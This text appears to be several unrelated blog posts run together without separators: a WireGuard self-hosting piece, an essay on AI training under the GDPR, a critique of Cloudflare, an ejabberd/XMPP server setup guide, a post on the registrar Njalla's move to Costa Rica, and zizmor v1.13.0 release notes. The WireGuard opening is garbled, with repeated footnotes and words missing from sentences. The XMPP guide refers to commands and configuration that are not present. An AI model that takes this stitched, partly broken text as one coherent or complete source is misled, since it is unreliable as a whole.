deploy and it just works. Nonetheless, some knowledge of networking is required to think through how to deploy WireGuard appropriately for a given context. Being comfortable with configuring interfaces and firewalls is also necessary to troubleshoot the inevitable connectivity issues. One can appreciate why solutions that abstract over WireGuard exist. I used Tailscale extensively before this and did not have think through things as much as I did here. This was all solved for me. I just had to install the agent on each device, authorize it, and suddenly packets moved securely and efficiently across networks. And yet, WireGuard was there all along and I knew that I could unearth the abstraction. Now I appreciate its simplicity even more, and take relish in having a stronger understanding of what I previously took for granted. Lastly, I purposefully omitted other aspects of my WireGuard setup for self-hosting, particularly around DNS. This will be the subject of another article, which is rather similar to the one I wrote on using Tailscale with custom domains . Furthermore, a closer look at access control in this topology might be of interest to others considering that there are multiple firewalls that come into play. Each interface has its own configuration file, and can be thought as a “connection profile” in the context of a VPN. This profile is managed by in Linux, or through the WireGuard app for macOS, Android, etc.  ↩︎ In my case, that’s Debian and nftables . This article from Pro Custodibus explains how to configure for the hub.  ↩︎ There should be no dependencies to services or hardware outside of the physical network. I should be able to connect to my self-hosted services while I’m at home as long as there’s electricity in the house and the hardware involved is operating without problems. Borrow elements of the Zero Trust Architecture where appropriate. Right now that means treating all of my services and devices as resources, securing all communications (i.e not trusting the underlying network), and enforcing least-privileged access. Provisions made to connect to a device from outside the home network should be secondary and optional. While I do wish to use to my services while I’m away, satisfying this should not compromise the fundamental design of my setup. For example, I shouldn’t rely on tunneling services provided by third-parties. Use WireGuard natively as opposed to software that builds on top of WireGuard. I choose to favor simplicity and ease of understanding rather than convenience or added features, ergo , complexity. Use of a control plane should not be required. All endpoints are first-class citizens and managed individually, regardless of using a network topology that confers routing responsibilities to a given peer. Mesh networking and direct peer-to-peer connections. It’s ok to have peers act as gateways if connections need to be established across different physical or logical networks. The size, throughput, and bandwidth of the network is small enough that prioritizing performance is not strictly necessary. Automatic discovery or key distribution . It’s ok for nodes in the network to be added or reconfigured manually. The desktop computer connects to the server to access a calendar, git repositories, etc The tablet connects to the server to download RSS feeds The laptop and desktop connect with each other to sync files Said device is not running WireGuard Said device is using a different or , in which case the peer’s or port in does not match Said device is using a different , in which case the peer’s does not match WireGuard: Next Generation Kernel Network Tunnel Networking for System Administrators Primary WireGuard Topologies How Tailscale works Each interface has its own configuration file, and can be thought as a “connection profile” in the context of a VPN. This profile is managed by in Linux, or through the WireGuard app for macOS, Android, etc.  ↩︎ In my case, that’s Debian and nftables . This article from Pro Custodibus explains how to configure for the hub.  ↩︎

0 views
ava's blog 3 weeks ago

challenges around AI and the GDPR

Today, I once again met up with my mentor around data protection law and had some questions about his view on the compatibility of AI with several aspects of the General Data Protection Regulation (GDPR). The talk went really well and was super engaging, but I soon had to run home so I would not miss the GDPRhub meeting by noyb.eu! Quick plug: Consider donating to noyb.eu or even becoming a member if you care about defending data protection and privacy from Meta, Google et. al. :) I am volunteering as a Country Reporter for them! The meeting included a really great presentation on the exact topics I had discussed earlier, and motivated me to write a post about it, so here we are. The first issues start with the actual aggregation of data specific models are trained on. There are, of course, a lot of internal, small models being trained on a very limited dataset, for a highly specific purpose. It is usually in the best interest of their developers to keep it that way to not dilute the output and keep it small. What would scraping half the net do for a model that is supposed to help with a specific template document at work? But for the big ones (ChatGPT, Copilot, Grok and more) that are decidedly supposed to be allrounders who can be used for anything, there is a clear incentive to vacuum up anything they can. This directly contradicts the principle of data minimization . Article 5 lists several principles relating to the processing of personal data, and data minimization is the idea that processing should be adequate, relevant and limited to what is necessary in relation to the purposes. In practice, this means acquiring the least amount of personal data to get the job done. For example: In recent rulings, it was declared unlawful that train companies in the EU 1 demand your gender, email address and/or telephone number just to buy a train ticket, as these infos aren't needed for a customer to use a train, nor for the company to provide the service. It should be optional to share that, at least. This principle usually also incorporates aspects of another principle: The storage limitation . Personal data should only be stored as long as is necessary, but how do you decide how long a name, address, telephone number and similar information is necessary for the purposes in a huge dataset? Depending on the methods, it might even be impossible to remove. Furthermore, there's the principle of purpose limitation . Processing needs a stated purpose that needs to be specific, explicit and legitimate. With limited models, this may be easier, as the use for it is very targeted; but it is a point of contention in the legal discourse about whether something as very vague as "AI model training" or similar purposes related to that are specific enough, and if companies can reference an exemption for their models based on scientific research purposes. Also: It is likely that the data they are scraping has been put out there or been acquired for a different purpose. If I consent to having my picture taken and put on the company website to promote our product and drive customer engagement, I am not consenting to the fact that 5 years down the line, my image will be used for AI training, for example. A change of purpose requires information, maybe even renewed consent, but that is a mixed bag. It is relatively easy to inform and get consent of users if they have an account on your platform, as you can show them a note about it and let them make a decision - but what about data scraping outside of platforms? How can users outside of services like the ones Meta, Microsoft, X or Google own get a chance to consent or be informed about their personally identifiable data being used to train AI? The GDPR handles information requirements in two main ways: Article 13 is for companies (usually referred to as "controllers") obtaining data and consent directly from you, and Article 14 is for the case in which the controller obtains data of you indirectly (for example, by using someone else's datasets, or getting your data transmitted to them by the company who actually obtained it directly from you). So in the case of the broad scraping taking place, companies are still technically required to inform you based on Article 14. The problem is that obviously, it is not feasible in practice. If they scrape your name and have nothing else, how will they contact you? How are their employees supposed to search through terabytes of data to search for personally identifiable data? 2 How would they detect sensitive data that comes with extra requirements, like data related to health, sexual identity, ethnic origin, religion and more ( Article 9 ) or the data of children ( Article 8 ), and fulfill them? How are they supposed to contact millions of people, and track who has opted out and who has opted in, who hasn't replied, etc.? Article 14 acknowledges this issue in section 5 when it says that they don't have to inform you if it would not be feasible to do so or would require disproportional effort. This effectively means that most big companies training AI with extremely large datasets scraping the entire net are off the hook from telling data subjects (you, as the affected person) about it. Consent is similarly tricky. Article 7 of the GDPR sets conditions for consent, which say that the controller (company) needs to demonstrate that you gave consent 3 and that the way to consent should not be misleading, should be distinguishable from other matters, accessible, easy to understand, not coerced and is not binding if it fails these standards. You have the right to withdraw your consent at any time. Again, this might be fulfilled in your user account settings, but how will you think of withdrawing consent if you have never even been informed that you are affected, and never had a chance of consenting to begin with? By law, and by the way the tech works, you withdrawing consent is only for future processing and will not affect past processing, and not all processing needs to have its legal basis in consent. 4 Article 6 covers the legal basis for any processing of personal data in the EU or of EU citizens. In practice, that means that usually, one or more of Article 6 a) - f) will apply and is used as legal basis. Only one needs to be fulfilled though for it to be lawful, and consent is only one of them. a) handles you giving consent for one or more specific purposes (blanket consent doesn't count!). b) is for when the processing is necessary to fulfill a contract - think about you ordering from an online shop, and they need to give your address to the shipping company. c) covers legal obligations; for example, back when restaurants were required to ask for your name and contact info to comply with Covid-19 measures the government instated. d) is for the niche cases where processing your data is necessary to protect you or someone else. A case I could think of is maybe if security camera footage is used where you are seen, to help find a thief that stole from you or the neighbor. e) is a bit vague, covering what's "necessary for the performance of a task carried out in the public interest or in the exercise of official authority vested in the controller". f) is the catch-all, saying processing is necessary due to a legitimate interest by the company or third party, unless these are overridden by the interests and fundamental rights and freedoms of the data subject (you as the affected person), especially if it is a child. As covered above, consent can be acquired with a user account, but not otherwise, so for a chunk of data scraped from the web outside of social media platforms, that falls away. For example, if they scrape my blog, I did not give consent, and I also do not have a contract with them. They have no legal obligation to scrape it, the scraping doesn't protect me or someone else, it is likely not in the public interest and they aren't an official authority either. That leaves the catch-all: Legitimate interest . 'Legitimate interest' can only be claimed as legal basis if the processing violates no part of the GDPR , as to not use it as a loophole; but arguably, as seen above, there at least a lot of questions, if not downright violations of the law as it is right now. Additionally, the sensitive data I already mentioned (from Article 9) cannot be processed under legitimate interest. That would be a chunk of data without a legal basis, then. It's also a delicate matter to discuss in general - if you believe AI will significantly advance humanity and is a superpower, you would surely argue that this is a legitimate interest to pursue and the rights and freedoms of data subjects don't trump that. But how do you prove this speculation about the future? What if we focus solely on more realistic interests, like the economic incentive of companies (the legitimate interest in keeping up with competition or making a lot of money) or more vague reasons like "providing a high quality tool serving our users and helping in research and development"? Would that be enough? How would the company argue that, for example, my blog data is necessary for this legitimate interest? But aside from that, there are several things that could impact the rights and freedoms of you, the data subject. There is the problem that the more data someone acquires, the more likely it is that data of you is in it. It doesn't have to immediately be personal data, but it is recognized in the discourse that when enough data is available, they can link up and become personally identifiable data that is no longer anonymous or unrelated. As an easy to understand example: An address by itself is not personal data, as it cannot be linked to anyone, but if you slowly fill in occupation, hair color, car brand, online orders, it becomes more likely that you can deduct who of the residents it is. A username like " RickRoller2000 " by itself with no other information is not by itself personally identifiable data, but if you suddenly also have the actual name of the person behind the account and link it to their username, the username becomes personally identifiable data. That poses the issue that a switch can happen for data that was previously not falling under GDPR that suddenly does. This introduces more complexity about everything I have mentioned prior, and that also means your rights. Additionally, there are inherent risks and difficulty of enforcing your rights (specific to the product) that need to be taken into account when judging legitimate interest vs. rights and freedoms. Things like: Once in it, it might be difficult or impossible to remove (violating the data protection goal of intervenability, and the right of deletion in Article 17 ). At best, the output may be restricted as in Article 18 . Objection/withdrawal from consent only ex nunc , not ex tunc (= doesn't affect past processing). Possibility of harmful hallucinations that slander people - like when a journalist reports about murder, and the model generates that the journalist committed the murder. If it weren't trained on these articles, it wouldn't happen. There are less severe cases too, about the output mischaracterizing or misattributing someone's work or impact. As some of these models increasingly seek to replace a Google Search or Wikipedia, this should not be underestimated. At best, the output could be influenced by corrections done by the company 5 via Article 16 . Possible inability to fulfill your right of access to your data (obtaining a copy) or confirmation that your data is being used (based on Article 15 ). A big likelihood of being uninformed, not having consented, or not having had the proper chance to consent; either because you don't have a user account, or you don't check your account settings to notice this new setting suddenly popping up, and also because Meta and others have set very short deadlines to opt out . Many services have decided to implement it this way to get as much consent as possible, but this also violates the GDPR as consent needs to be freely and clearly given and opted into (in practice: via sliders or checkboxes that are not activated by default) and the principle of privacy-friendly defaults (also called: "Privacy by Design" and "Privacy by Default" ). You need to know what you consent to, and you can't do that if you never go into your settings to see an already-enabled setting. Doubts about the companies' ability to apply different protections and requirements to different types of data in a dataset, for example health data and data of children; difficulty of children to understand the consequences and properly consent. Arguably hard for non-experts in tech and AI (or: the average layperson) to understand how the data is processed and what the consequences are, not just due to the details of training and output generation, but also due to how new this sort of AI use and prevalence is, and how difficult it is to predict how it will be used in the future. How can you realistically give consent to something if you can't really judge its impact on you? The GDPR is from 2016, came into effect 2018 and was deliberately worded in a tech-neutral way to still welcome innovation and make it fit around a variety of products and services. However, it could have hardly predicted this. What's easy to enforce with phones, computers or social media is a lot harder with training large language models or image generators. That begs the question - should the GDPR be changed? I personally hate that approach, but it is being discussed. We had hopes for the AI Act , and we could have some positive effects from the Digital Markets Act . However, the AI Act has the most regulations and requirements for high risk AI, and basically none for low risk systems. It seems ChatGPT and Co. would very likely fall under low risk, meaning it doesn't even meaningfully regulate the most popular and powerfully huge models. On the other hand, there are Data Protection Authorities that have a very supportive "make it happen" approach to it all, which has led to the Superior Court Cologne ruling very favorably on Meta AI opting everyone in by default and offering a short time to opt out, saying Article 5 section 2 b) DMA (= that the company may not combine personal data from the relevant core platform service with personal data from any further core platform services or from any other services provided by them or with personal data from third-party services) is not applicable. They're also also basing this on the fact that the data is public, that Meta has legitimate interests that override the rights of users, that the purpose is specified enough, that the data and use is low risk, and that there are no less intrusive ways for Meta to do this. They consider 6 weeks a long enough time to opt out. That decision is definitely regarded as horseshit by everyone I talked to about this stuff, but it nonetheless happened (even if it will be challenged). It is unfortunately a reality that there is intense lobbying, a strongly political arms race and fears that Europe gets further left behind in tech innovation, and it definitely colors the approaches and decisions by regulatory bodies. The Hamburg DPA also apparently said that even if the data was unlawfully collected, it doesn't mean that the hosting and use of the model is unlawful, which further muddies the waters and is hard to justify. As it is now, something has to give, and it is a little scary to see which side will likely give in. Now excuse me as I will collapse on the sofa as I wrote this for four hours straight right after work and the meeting, and I am so tired. Reply via email Published 23 Sep, 2025 I know of specific cases in France and Germany (x) (x) ↩ And that is not all, as I will get to the issue of anonymous data turning into personally identifiable data later on. ↩ We're getting to some exemptions to that later. ↩ You also have a right to object based on Article 21, which means the company needs to stop processing that data unless they demonstrate compelling legitimate reasons for the processing which override the interests, rights and freedoms of you as the affected person. But realistically, how do they stop processing your data if it is in a large dataset that increases daily, is used for training again and again, and in some way arguably is part of what decides the quality of the output? ↩ No idea how specifically it is handled internally there, but I've seen successful corrections or the model suddenly not giving an answer to a prompt that previously worked and showed lies. ↩

2 views
マリウス 3 weeks ago

Thoughts on Cloudflare

As many of you know, I am skeptical of the concept of relying on someone else’s computer , especially when a service grows to the point where it becomes an oligopoly, or worse, a monopoly. Cloudflare is, in my view, on track to becoming precisely that. As a result, I would argue they are a net negative for the internet and society at large. Besides the frustration they cause to VPN and Tor users through incessant captchas, Cloudflare’s infamous one more step pages have dulled users' vigilance, making them more vulnerable to even the most blatant malware attacks . Moreover, under the guise of iNnOvAtIvE cLoUd InFrAsTrUcTuRe , Cloudflare not only enable phishermen to phish and tunnelers to tunnel : Ironically, the very security measures they sell can be bypassed by bad actors using Cloudflare itself . It’s a similar irony that their systems, designed to shield clients from threats, sometimes struggle to defend their own infrastructure . Incidents like these highlight not only weaknesses in Cloudflare’s offerings but a broader issue: Cloudflare has become a highly attractive target for state-sponsored attacks , suffering from recurring breaches . Their sheer scale, considering that they are serving a substantial portion of the internet, means that an outage or compromise could have widespread, costly consequences. Another major concern is, that in many cases, Cloudflare acts as a man-in-the-middle SSL-terminating proxy between users and websites. They have visibility into everything users do on these sites, from browsing habits to submitting sensitive personal information. This makes Cloudflare a prime target for any actor seeking to harvest massive amounts of data. The Cloudbleed incident clearly demonstrated the risks: Tavis Ormandy posted the issue on his team’s issue tracker and said that he informed Cloudflare of the problem on February 17. In his own proof-of-concept attack he got a Cloudflare server to return “private messages from major dating sites, full messages from a well-known chat service, online password manager data, frames from adult video sites, hotel bookings. We’re talking full https requests, client IP addresses, full responses, cookies, passwords, keys, data, everything.” I stand with Hugo in considering Cloudflare harmful and recommend that websites avoid relying on it whenever possible. Cloudflare’s origins in Project Honeypot , and its early ties to the US Department of Homeland Security, are troubling to say the least: Five years later Mr Prince was doing a Master of Business Administration (MBA) at Harvard Business School, and the project was far from his mind, when he got an unexpected phone call from the US Department of Homeland Security asking him about the information he had gathered on attacks. Mr Prince recalls: “They said ‘do you have any idea how valuable the data you have is? Is there any way you would sell us that data?’. “I added up the cost of running it, multiplied it by ten, and said ‘how about $20,000 (£15,000)?’. “It felt like a lot of money. That cheque showed up so fast.” Mr Prince, who has a degree in computer science, adds: “I was telling the story to Michelle Zatlyn, one of my classmates, and she said, ‘if they’ll pay for it, other people will pay for it’.” Source: BBC Furthermore, Cloudflare has been criticized as an employer , reportedly fostering a hire-and-fire culture among its sales staff . Even its CEO has attracted controversy, such as suing neighbors over their dogs following objections to his plans to build an 11,300-square-foot estate. Plans that required lobbying to overcome local zoning laws . Given all this, it is time to reconsider Cloudflare’s dominant market position , controlling over 20% of the internet . Cloudflare has shown a pattern of equivocating on politically sensitive issues , perhaps to maintain its status as the world’s largest botnet operator , and they appear to defend “free speech” when it is profitable , but not when it isn’t . Cloudflare has also been accused of providing services to terrorists and drug traffickers while skirting international sanctions . Meanwhile, open-source developers have been harshly punished for less. Despite the brilliance of many engineers at Cloudflare, they are not infallible. They, too, experience recurring downtime and preventable mistakes . Cloudflare, like any other company, puts its pants on one leg at a time . There is no reason it should be treated as the default, or sole, solution for content delivery. If running your own Varnish instances isn’t feasible, and you need a global CDN, consider these alternatives to support competition and balance the scales: Info: Some hosting services might use Cloudflare without disclosing it openly/obviously, e.g. Render . Make sure to check whatever hosting service that you’re using whether it employs Cloudflare’s infrastructure in the background. If you currently have domains registered with Cloudflare, move them elsewhere immediately. As a general rule, never allow your CDN or hosting provider to also hold your domain registrations. Should the hosting provider cut you off, you’ll want the freedom to quickly redirect your domains to another provider without disruption. For more info, visit the cloud and domains sections of the infrastructure page. If, however, you’re running Cloudflare’s more advanced service offers, like Cloudflare Workers, you will likely have a harder time moving away. While some frameworks support different providers, like Vercel, Fastly, AWS, Azure, or Akamai, it is likely that most simple implementations will be heavily reliant on Cloudflare’s architecture. There’s unfortunately no easy path out of this, other than rewriting the specific components and infrastructure deployment configuration to support a different provider. If you wish to identify or avoid websites that make use of Cloudflare, you can use this browser extension for Firefox and Chrome (ironically created by Cloudflare). Beware that these extensions might transfer information about your browsing behavior to Cloudflare. Configure them to be active only when manually clicked on specific websites that you want investigate. There are third-party alternatives like this and this , as well as older/unmaintained extensions like this and this . PS: Decentraleyes is a solid option to enhance browsing privacy; check the browser section for other helpful extensions. All that said, you might think “Come on, Cloudflare isn’t that bad!” , and you’d be right: Every now and then, they do some good . *smirk* Still, we have to recognize that Cloudflare has grown into a cornerstone of modern digital infrastructure, which is a role that could eventually render it too big too fail , to borrow a term from the financial world. Footnote: The artwork was generated using AI and further botched by me using the greatest image manipulation program .

1 views
Jeff Geerling 3 weeks ago

You can finally manage Macs with FileVault remotely in Tahoe

It's nice to have a workstation set up that you can access anywhere via Screen Sharing to check on progress, jot down a note, etc.—and not be tied to a web app or some cloud service. I run a Wireguard VPN at home and at my studio, so I can remotely log into any of my infrastructure through the VPN—Macs included.

0 views
codedge 4 weeks ago

Modern messaging: Running your own XMPP server

Since a years we know, or might suspect, our chats are listend on, our uploaded files are sold for advertising or what purpose ever and the chance our social messengers leak our private data is incredibly high. It is about time to work against this. Since 3 years the European Commission works on a plan to automatically monitor all chat, email and messenger conversations. 1 2 If this is going to pass, and I strongly hope it will not, the European Union is moving into a direction we know from states suppressing freedom of speech. I went for setting up my own XMPP server, as this does not have any big resource requirements and still support clustering (for high-availabilty purposes), encryption via OMEMO, file sharing and has support for platforms and operating systems. Also the ecosystem with clients and multiple use cases evolved over the years to provide rock-solid software and solutions for multi-user chats or event audio and video calls. All steps and settings are bundled in a repository containing Ansible roles: https://codeberg.org/codedge/chat All code snippets written below work in either Debian os Raspberry Pi OS. The connection from your client to the XMPP server is encrypted and we need certificates for our server. First thing to do is setting up our domains and point it to the IP - both IPv4 and IPv6 is supported and we can specify both later in our configuration. I assume the server is going to be run under and you all the following domains have been set up. Fill in the IPv6 addresses accordingly. ejabberd is a robust server software, that is included in most Linux distributions. Install from Process One repository I discovered ProcessOne, the company behind ejabberd , also provides a Debian repository . Install from Github To get the most recent one, I use the packages offered in their code repository . Installing version 25.07 just download the asset from the release: Make sure the fowolling ports are opened in your firewall, taken from ejabberd firewall settings . Port , used for MQTT, is also mentioned in the ejabberd docs, but we do not use this in our setup. So this port stays closed. Depending how you installed ejabberd the config file is either at or . The configuration is a balance of 70:30 between having a privacy-focused setup for your users and meeting most of the suggestions of the XMPP complicance test . That means, settings that protect the provacy of the users are higher rated despite not passing the test. Therefore notable privacy and security settings are: The configuration file is in YAML format. Keep an eye for indentation. Let’s start digging into the configuration. Set the domain of your server Set the database type Instead of using the default type, we opt for , better said . Generate DH params Generate a fresh set of params for the DH key exchange. In your terminal run and link the new file in the ejabberd configuration. Ensure TLS for server-to-server connections Use TLS for server-to-server (s2s) connections. The listners The listeners aka inside the config especially for , , and are important. All of them listen on port . Only one request handler is attached to port , the . For adminstration of ejabberd we need a user with admin rights and properly set up ACLs and access rules. There is a separat section for ACLs inside the config in which we set up an admin user name . The name of the user is important for later, when we actually create this user. The should already be set up, just to confirm that you have a correct entry for the action. Now the new user needs to be create by running this command on the console. Watch out to put in the correct domain. Another user can be registered with the same command. We set as the admin user in the config previously. That is how ejabberd knows which user has admin permissions. Enabling file uploads is done with . First, create a folder where the uploads should be stored. Now update the ejabberd configuration like this: The allowed file upload size is defined in the param and is set to 10MB. Make sure, to delete uploaded files in a reasonable amount of time via cronjob. This is an example of a cronjob, that deletes files that are older than 1 week. Registration in ejabberd is done via and can be enabled with these entries in the config file: If you want to enable registration for your server make sure you enable a captcha for it. Otherwise you will get a lot of spam and fake registrations. ejabberd provides a working captcha script , that you can copy to your server and link in your configuration. You will need and installed on you system. In the config file ejabberd can provision TLS certificates on its own. No need to install certbot . To not expose ejabberd directly to the internet, is put in front of the XMPP server. Instead of using nginx , every other web server (caddy, …) or proxy can be used as well. Here is a sample config for nginx : The nginx vhosts offers files, and , for indicating which other connection methods (BOSH, WS) your server offers. The details can be read in XEP-0156 extension. Opposite to the examples in the XEP, there is no BOSH, but only a websocket connection our server offers. The BOSH part is removed from the config file. host-meta.json Put that file in a folder your nginx serves. Have a look at the path and URL it is expected to be, see . Clients I can recommend are Profanity , an easy to use command-line client, and Monal for MacOS and iOS. A good overview of client can be found on the offical XMPP website . Citizen-led initiative collecting information about Chat Controle https://fightchatcontrol.eu   ↩︎ Explanation by Patrick Breyer, former member of the European Parliament https://www.patrick-breyer.de/en/posts/chat-control/   ↩︎ 5222 : Jabber/XMPP client connections, plain or STARTTLS 5223 : Jabber client connections, using the old SSL method 5269 : Jabber/XMPP incoming server connections 5280/5443 : HTTP/HTTPS for Web Admin and many more 7777 : SOCKS5 file transfer proxy 3478/5349 : STUN+TURN/STUNS+TURNS service XMPP over HTTP is disabled ( mod_bosh ) Discover then a user last accessed a server is disabled ( mod_last ) Delete uploaded files on a regular base (see upload config ) Register account via a web page is disabled ( mod_register_web ) In-band registration can be enabled, default off, captcha secured ( mod_register , see registration config ) Citizen-led initiative collecting information about Chat Controle https://fightchatcontrol.eu   ↩︎ Explanation by Patrick Breyer, former member of the European Parliament https://www.patrick-breyer.de/en/posts/chat-control/   ↩︎

0 views
マリウス 1 months ago

Njalla Has Silently Changed: A Word of Caution

I’ve been using Njalla as my primary domain service for the past few years, and I’ve had nothing but good things to say about them. Their website is simple yet functional, their support is quick and efficient, and the company offers its services in a way that should be the global standard when it comes to data and privacy protection. Njalla made sense for me on many different levels: They’re a domain provider headquartered on a former pirate island nation in the Caribbean, which is home to countless offshore trust funds, that registers your domain in their name, so none of your personal information appears in the mandatory ICANN registration data. All of this is offered without any KYC requirements, and with the option to pay using Monero. And if that’s not enough, Njalla sends every email encrypted with your GPG public key and can even forego email entirely in favor of XMPP notifications with OMEMO encryption. Yes, Njalla also provides an API (with access tokens that can be configured with granular permissions) which works seamlessly with tools like Certbot , Lego , and others to request Let’s Encrypt certificates via DNS validation. Heck, there are even Terraform providers that support it. And if that still weren’t enough reasons to like Njalla , the Njalla blog offered unrivaled transparency and entertainment for everyone, giving people the chance to see with their own eyes how Njalla was fighting for the little guys . On top of that, I’ve always sympathized with brokep , Njalla ’s founder, and his work and many of his views. If you’re unfamiliar with him or his history, I recommend the (relatively new) series The Pirate Bay , which premiered on Sveriges Television at the end of 2024. Over the past few years, I’ve been quite vocal in my praise for Njalla . In fact, if you’re a regular reader of this site or have come across me on other platforms, you’ve probably seen me plug Njalla the same way Jensen Huang plugs AI . However, a recent interaction in the VT100 community channel prompted me to do what I periodically do with every service I use: Check what’s new. This time, it was Njalla ’s turn. While browsing through various pages on their website, I came across the About page and was surprised to find the following statement: Njalla is run by njalla.srl based in Costa Rica. Curious, I checked their terms of service and confirmed that Njalla does indeed appear to have relocated its operations from Nevis to Costa Rica. I searched through my email history to see if there had been any announcement about this change, but found nothing. Wanting to know when this happened, I checked Njalla ’s Mastodon and Bluesky profiles, but again found no mention of the move. I even went as far as looking at brokep ’s social profiles , only to find that they were either deleted or inactive. At that point, I started to get a bad feeling. Had Njalla been sold to someone else? Before jumping to conclusions, I decided to contact Njalla support to clarify the situation. Subject: 1337 Services LLC -> Njalla SRL? I just stumbled upon the fact that Njalla seemingly changed hands without any notice, and I would like to understand what happened to 1337 Services LLC on Nevis and who the new owner Njalla SRL is. I would appreciate further insights into this topic. Kind regards! The support replied promptly: Internal restructuring. Nothing to worry about. However, while it was a response , it wasn’t particularly satisfying, so I decided to be the PITA that I am somewhat known to be and ask again: Thank you for your reply and your re-assurance. I’d like to apoligize in advance for being a PITA, but with brokep seemingly having disabled his social media profiles (Bsky, Mastodon, X), discovering this change felt “off”. Also, as someone who has a relatively decent understanding of offshore jurisdictions and their governing laws, I am wondering about the motivation for this move. Costa Rica’s offshore landscape appears to have changed over the past years and their SRL/SA seemingly requires company books to reflect share ownership, which in turn list the owner’s name and ID numbers within the Central Bank of Costa Rica via the Registry of Transparency and Final Beneficiaries (RTBF). While UBO info is not publicly available unless explicitly listed as initial shareholders in the national registry, the information is still accessible and shareable by government entities and could make it easier for foreign entities to pressure the owners (and hence Njalla) into doing things it would otherwise not do. In addition, foreign court orders appear to be somewhat easier enforceable in Costa Rica’s jurisdiction, as opposed to Nevis, where foreign entities would in theory require dealing with local courts to obtain a local court order. While the trend towards transparency, information sharing and absurd KYC hasn’t passed Nevis/St. Kitts either (especially in terms of banking infrastructure) it appears that jurisdictions like Nevis or the Seychelles still seem to be “better” choices for operating a service like Njalla. I have been very vocal to recommend Njalla on different platforms, and I would like to update my recommendation based on this new reality. I would hence be curious to understand the rational behind the change, if you wouldn’t mind sharing a few insights. If preferrable you’re welcome to reach out via email to xxx (pubkey attached) or via XMPP/OMEMO to xxx. Thank you kindly and best regards! While I wasn’t expecting Njalla to offer in-depth strategic reasoning for this move, I nevertheless hoped for them to provide solid arguments as for why they believe Costa Rica is a good option for their operations and maybe even an explanation on why they haven’t notified their customers of the change. However, the reply that I got back was disappointing, to put it mildly: We do understand your concerns, but the reasoning or insights is not something we share. If you feel you can’t recommend our services any more, then of course you shouldn’t. That is totally up to you. Kind regards, Njalla It’s clear that Njalla is operating on a take it or leave it basis here. While they are entirely within their rights to do so, one could argue that using Njalla inherently requires a significant degree of trust. After all, they are the ones who legally own your domain . Given that, I think it’s fair to say that customers deserve at least some level of transparency in return. At least enough to feel confident that Njalla isn’t working against their interests. Note: There are many reasons why moving the company might make sense. While we can draw up as many conspiracy theories as we’d like, the most banal explanation might have to do with brokep being a Swedish citizen and supposedly still residing in the EU. Doing business within a place like Nevis, which the EU considers a tax haven and which is being grey-listed as non-cooperative tax jurisdiction every once in a while, can be a bit of a PITA . Not only is it unlikely for brokep to benefit from low-/no-tax advantages that the jurisdiction offers, it is on the contrary quite possible that EU CFC rules are intentionally hurting him, especially with a digital (low substance) business like Njalla , especially when dealing with cryptocurrency, especially with Monero, to discourage the average Joe Peter from doing business in jurisdictions that have historically been reserved for the bloc’s politicians and other elites. After all, the democractization of tax havens is certainly not something world leaders are in favor of. Costa Rica has managed to escape the bloc’s Annex I (in 2023) and Annex II (in 2024, approved 2025) and is not considered a low-tax country or tax haven. With CR joining the OECD’s CRS, it has certainly become easier for EU residents to do business in the Latin American country, despite its territorial tax regime. As boring as this sounds, but it might just be that brokep got sick of dealing with the EU charade around offshore tax havens – btw, hey, EU, how are things in Luxembourg, Cyprus and Monaco going? – and chose a more viable solution. I dug up Njalla ’s Terms of Service on the Internet Archive and found that the change seems to have occurred sometime between October 2, 2024, and December 16, 2024. Whether or not it’s legally permissible for a company to change something as fundamental as its jurisdiction or corporate registration without informing existing customers, I found the lack of communication troubling. What concerned me even more was that, after I pointed out the change, Njalla didn’t seem interested in offering any further explanation. On the contrary, their responses came across as an attempt to quietly brush the matter aside and move on. While the service continues to function as it always has, and I haven’t encountered any issues, I’m honestly uncertain about how to interpret the situation. As I’ve mentioned before, I deeply admire the work that brokep is doing, and I’m a strong supporter of Njalla ’s mission. I’ve been recommending their service for years, and I likely will continue to do so, although with reservations. That said, this situation has somewhat tarnished my perception of Njalla . Not only has their blog become less insightful over the years, but it also appears that they are actively concealing information from those who trust them: Their customers. With Njalla ’s lack of transparency and unsatisfactory responses, I’m uncertain about what to make of the situation. I’d assume that if you have a normal domain with Njalla , there’s probably little to worry about, provided the company hasn’t been sold to a new owner. The service seems to be operating as usual, and I haven’t heard of any malicious intent regarding domain ownership. That said, if you’re considering registering a domain to poke fun at a logistics provider or other international entities that might take issue with it, I wouldn’t be so confident that Njalla will still have Batman handling the situation. As long as you don’t provide your PII and use untraceable payment methods, however, the worst-case scenario is that Njalla shuts down your domain and won’t return it to you. I continue to hold several domains with Njalla . While I could migrate to another provider, I’m willing to wait, observe, and give Njalla the benefit of the doubt for now. That said, I will certainly be more cautious moving forward and think twice before registering any new domains with them. Frankly, there aren’t many trustworthy and reliable alternatives, especially ones backed by prominent figures with (for the most part) agreeable values. If you’re seeking services based in offshore jurisdictions, there’s a non-exhaustive list in the domains section of the infrastructure page. It’s important to note that when you allow someone else to register a domain on your behalf, you’re effectively entrusting them with ownership of the domain , meaning they could ultimately do whatever they wish with it. Therefore, trustworthiness is a critical factor when evaluating these services. Footnote: The artwork was generated using AI and further botched by me using the greatest image manipulation program .

1 views
ENOSUCHBLOG 1 months ago

One year of zizmor

This is a dual purpose post: I’ve released zizmor v1.13.0 , and zizmor has turned one year old 1 ! This release isn’t the biggest one ever, but it does include some nice changes (many of which were contributed or suggested by zizmor’s increasingly large community). Highlights include: A new (pedantic-level) undocumented-permissions audit rule, which flags explicit permission grants (like ) that lack an explanatory comment. Many thanks to @johnbillion for contributing this! (Long requested) support for disabling individual audit rules entirely, via in the configuration. Support for auto-fixing many of the obfuscation audit’s findings, including a brand new constant expression evaluator for github-actions-expressions that can unroll many common cases of obfuscated GitHub Actions expressions. Many thanks to @mostafa for contributing this, along with so much else of zizmor’s auto-fix functionality over the last few releases! Support for “grouped” configurations, which resolve a long-standing architectural limitation in how zizmor loads and applies a user’s configuration. The TL;DR of this change is that versions of zizmor prior to 1.13.0 could only ever load a single configuration file per invocation, which meant that invocations like wouldn’t honor any configuration files in or . This has been changed so that each input group (i.e. each input argument to ) loads its own isolated configuration. In practice, this should have no effect on typical users, since the average user likely only runs or . But it’s something to be aware of (and will likely benefit you) if you’re a bulk user! These changes build on a lot of other recent (v1.10.0 and later) improvements, which could easily be the subject of a much longer post. But I’d like to focus the rest of this post on some numbers for and reflections on the past year of zizmor’s growth. As of today (September 12, 2025), zizmor has: 26 unique audit rules , encompassing a wide range of reactive and proactive security checks for GitHub Actions workflows and action definitions. This is up from 10 rules in the first tagged release (v0.1.0), which predates the changelog. It also undercounts the growth of zizmor’s complexity and feature set, since many of the rules have been significantly enhanced over time. Just over 3000 stars on GitHub, growing from close to zero at the start of the year. 